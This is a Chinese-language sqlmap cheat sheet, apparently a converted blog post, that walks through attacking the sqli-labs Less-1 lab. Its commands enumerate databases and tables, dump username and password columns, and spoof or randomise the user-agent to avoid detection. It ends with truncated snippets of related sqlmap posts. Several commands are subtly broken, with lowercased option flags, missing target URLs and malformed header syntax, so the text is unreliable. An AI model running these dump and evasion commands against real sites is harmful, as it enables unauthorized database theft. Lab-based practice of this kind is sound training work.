用法以kali linux下sqli-lab第一關為例192.168.198.136/sqli-labs/less-1/?id=1
-u 引數
後面跟url 執行
sqlmap -u
-r 引數
後面跟txt ,txt內容為該url的請求報文資訊
sqlmap -r /root/1.txt
獲取所有資料庫
sqlmap -u --dbs
獲取security資料庫中所有表名
sqlmap -u -d security --tables
獲取security資料庫中user表中所有字段
sqlmap -u -d security -t users --columns
獲取security資料庫中user表中字段的內容
sqlmap -u -d security -t users -c username,password --dump
獲取資料庫使用者
sqlmap -u --users
--password
--current-db
--current-user
(避免用sqlmap 的user-agent 被發現報錯)
sqlmap -u "127.0.0.1/sqli-labs/less-1/?id=1" --user-agent="mozilla/5.0 (x11; linux x86_64; rv:68.0) gecko/20100101 firefox/68.0" --banner
用--user-agent 設定user-agent
也可以用--random-agent 隨機生成user-agent
需要在host後面加號或者-level 5
需要在referer後面加號或者-level 3
sqlmap.py -u "" -h "user-agent:123"(指定user-agent乙個引數)
sqlmap.py -u "" --headers = "user-agent:123\ncookie:123456" --banner
(--headers 同時設定多個引數)
sqlmap的基本用法
以sqli labs master less 1 為例 對於需要登入的 或者post提交資料的,可以通過抓取http資料報來進行以sqli labs master less 11 為例 通過bp抓包。把抓取到的內容儲存為name.txt。然後通過指定這個資料報進行探測 爆出所有的資料庫名 pytho...
sqlmap的簡單用法
sqlmap 是乙個開源滲透測試工具,它可以自動檢測和利用 sql 注入漏洞並接管資料庫伺服器。它具有強大的檢測引擎,同時有眾多功能,包括資料庫指紋識別 從資料庫中獲取資料 訪問底層檔案系統以及在作業系統上帶內連線執行命令。安裝完python,sqlmap以後就可以進行使用 簡單使用 知道庫名之後 ...
Sqlmap注入基礎命令
1.檢測當前url是否是存在sql注入漏洞 sqlmap.py u url 2.檢測當前使用的資料庫 sqlmap.py u url current db 3.檢視所有的資料庫 sqlmap.py u url dbs 4.查詢 資料庫下的所有表 sqlmap.py u url d 庫名 tables...